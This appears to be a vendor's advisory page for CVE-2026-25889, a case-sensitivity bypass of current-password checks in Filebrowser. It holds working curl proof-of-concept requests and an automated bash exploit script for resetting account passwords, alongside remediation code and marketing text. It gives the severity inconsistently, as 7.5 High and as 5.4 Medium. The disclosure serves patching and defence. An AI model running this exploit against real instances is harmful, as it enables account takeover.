CVE-2026-25889

CVE-2026-25889 is a medium-severity security vulnerability in github.com/filebrowser/filebrowser/v2 (go), affecting versions <= 2.57.0. It is fixed in 2.57.1.

Summary

Security Advisory: Authentication Bypass in User Password Update

A case-sensitivity flaw in the password validation logic allows any authenticated user to change their password (or an admin to change any user's password) without providing the current password. By using Title Case field name "Password" instead of lowercase "password" in the API request, the current_password verification is completely bypassed. This enables account takeover if an attacker obtains a valid JWT token through XSS, session hijacking, or other means.

CVSS Score: 7.5 (High)
CWE: CWE-178 (Improper Handling of Case Sensitivity)

Details

The vulnerability exists in http/users.go in the userPutHandler function (lines 181-200).

Vulnerable Code

// http/users.go:181-200
if d.settings.AuthMethod == auth.MethodJSONAuth {
    var sensibleFields = map[string]struct{}{
        "all":          {},
        "username":     {},
        "password":     {},  // lowercase
        "scope":        {},
        "lockPassword": {},
        "commands":     {},
        "perm":         {},
    }

    for _, field := range req.Which {
        if _, ok := sensibleFields[field]; ok {  // Case-sensitive lookup
            if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
                return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
            }
            break
        }
    }
}

Root Cause

  1. The sensibleFields map uses lowercase keys (e.g., "password")
  2. The lookup sensibleFields[field] is case-sensitive
  3. When req.Which contains "Password" (Title Case), the lookup returns false
  4. The password verification block is skipped entirely
  5. Later in the code (line 229), field names are converted to Title Case for processing, so "Password" is a valid field name

Attack Flow

1. Attacker obtains victim's JWT token (via XSS, log leakage, etc.)
2. Attacker sends PUT /api/users/{id} with:
   - which: ["Password"]  (Title Case - bypasses validation)
   - data.password: "attacker_password"
   - NO current_password field required
3. Password is changed without verification
4. Victim is locked out, attacker has full access

PoC

Prerequisites

  • A valid JWT token for any user account
  • Target Filebrowser instance using JSON authentication (default)

Reproduction Steps

Step 1: Obtain a valid JWT token

TOKEN=$(curl -s -X POST "http://target:8080/api/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"victim","password":"victim_password"}')

Step 2: Attempt normal password change (should fail)

curl -s -X PUT "http://target:8080/api/users/1" \
  -H "X-Auth: $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "what": "user",
    "which": ["password"],
    "data": {"id": 1, "password": "NewPassword123456"}
  }'
# Response: 400 Bad Request (the current password is incorrect)

Step 3: Bypass with Title Case (succeeds without current_password)

curl -s -X PUT "http://target:8080/api/users/1" \
  -H "X-Auth: $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "what": "user",
    "which": ["Password"],
    "data": {"id": 1, "password": "HackedPassword123"}
  }'
# Response: 200 OK

Step 4: Verify account takeover

# Original password no longer works
curl -s -X POST "http://target:8080/api/login" \
  -d '{"username":"victim","password":"victim_password"}'
# Response: 403 Forbidden

# New password works
curl -s -X POST "http://target:8080/api/login" \
  -d '{"username":"victim","password":"HackedPassword123"}'
# Response: Valid JWT token

Automated PoC Script

#!/bin/bash
# Usage: ./poc.sh <target> <username> <current_password> <new_password>

TARGET="$1"
USERNAME="$2"
CURRENT_PASS="$3"
NEW_PASS="$4"

# Login
TOKEN=$(curl -s -X POST "$TARGET/api/login" \
  -H "Content-Type: application/json" \
  -d "{\"username\":\"$USERNAME\",\"password\":\"$CURRENT_PASS\"}")

# Get user ID from token
USER_ID=$(echo "$TOKEN" | python3 -c "
import sys,json,base64
parts=input().split('.')
payload=json.loads(base64.b64decode(parts[1]+'=='))
print(payload['user']['id'])
")

# Exploit: Change password without current_password
curl -s -X PUT "$TARGET/api/users/$USER_ID" \
  -H "X-Auth: $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{
    \"what\": \"user\",
    \"which\": [\"Password\"],
    \"data\": {\"id\": $USER_ID, \"password\": \"$NEW_PASS\"}
  }"

echo "Password changed to: $NEW_PASS"

Who is Impacted

  • All Filebrowser users using JSON authentication method (default configuration)
  • Any user whose JWT token can be obtained by an attacker
  • Particularly high-value targets: administrator accounts

Attack Scenarios

Scenario Impact
XSS + Token Theft Complete account takeover
JWT in Server Logs Mass account compromise
Shared Computer Session hijacking
Malicious Browser Extension Credential theft

Security Impact

Category Severity
Confidentiality High - Attacker gains full account access
Integrity High - Attacker can modify all user data
Availability High - Legitimate user locked out

Scope

  • The vulnerability affects password modification only
  • Other sensitive fields (Username, Scope, Perm, etc.) have additional protection via NonModifiableFieldsForNonAdmin check
  • However, for administrators, all fields can be modified using this bypass technique

Option 1: Case-insensitive field matching (Recommended)

// Convert field to lowercase before checking
for _, field := range req.Which {
    if _, ok := sensibleFields[strings.ToLower(field)]; ok {
        if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
            return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
        }
        break
    }
}

Option 2: Use Title Case in sensibleFields

var sensibleFields = map[string]struct{}{
    "All":          {},
    "Username":     {},
    "Password":     {},  // Title Case to match post-transformation
    "Scope":        {},
    "LockPassword": {},
    "Commands":     {},
    "Perm":         {},
}

// Check AFTER field name transformation
for k, v := range req.Which {
    v = cases.Title(language.English, cases.NoLower).String(v)
    req.Which[k] = v
    
    // Now check with Title Case
    if _, ok := sensibleFields[v]; ok {
        if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
            return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
        }
        break
    }
}

References

  • Affected File: http/users.go
  • Affected Lines: 181-200
  • Related Code: NonModifiableFieldsForNonAdmin (line 17)

Impact

CVE-2026-25889 has a CVSS score of 5.4 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.57.1); upgrading removes the vulnerable code path.

Affected versions

github.com/filebrowser/filebrowser/v2 (<= 2.57.0)

Security releases

github.com/filebrowser/filebrowser/v2 → 2.57.1 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade github.com/filebrowser/filebrowser/v2 to 2.57.1 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-25889? CVE-2026-25889 is a medium-severity security vulnerability in github.com/filebrowser/filebrowser/v2 (go), affecting versions <= 2.57.0. It is fixed in 2.57.1.
  2. How severe is CVE-2026-25889? CVE-2026-25889 has a CVSS score of 5.4 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/filebrowser/filebrowser/v2 are affected by CVE-2026-25889? github.com/filebrowser/filebrowser/v2 (go) versions <= 2.57.0 is affected.
  4. Is there a fix for CVE-2026-25889? Yes. CVE-2026-25889 is fixed in 2.57.1. Upgrade to this version or later.
  5. Is CVE-2026-25889 exploitable, and should I be worried? Whether CVE-2026-25889 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-25889 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-25889? Upgrade github.com/filebrowser/filebrowser/v2 to 2.57.1 or later.

Other vulnerabilities in github.com/filebrowser/filebrowser/v2

CVE-2026-54090CVE-2026-54093CVE-2026-54094CVE-2026-54092CVE-2026-54096

Stop the waste.
Protect your environment with Kodem.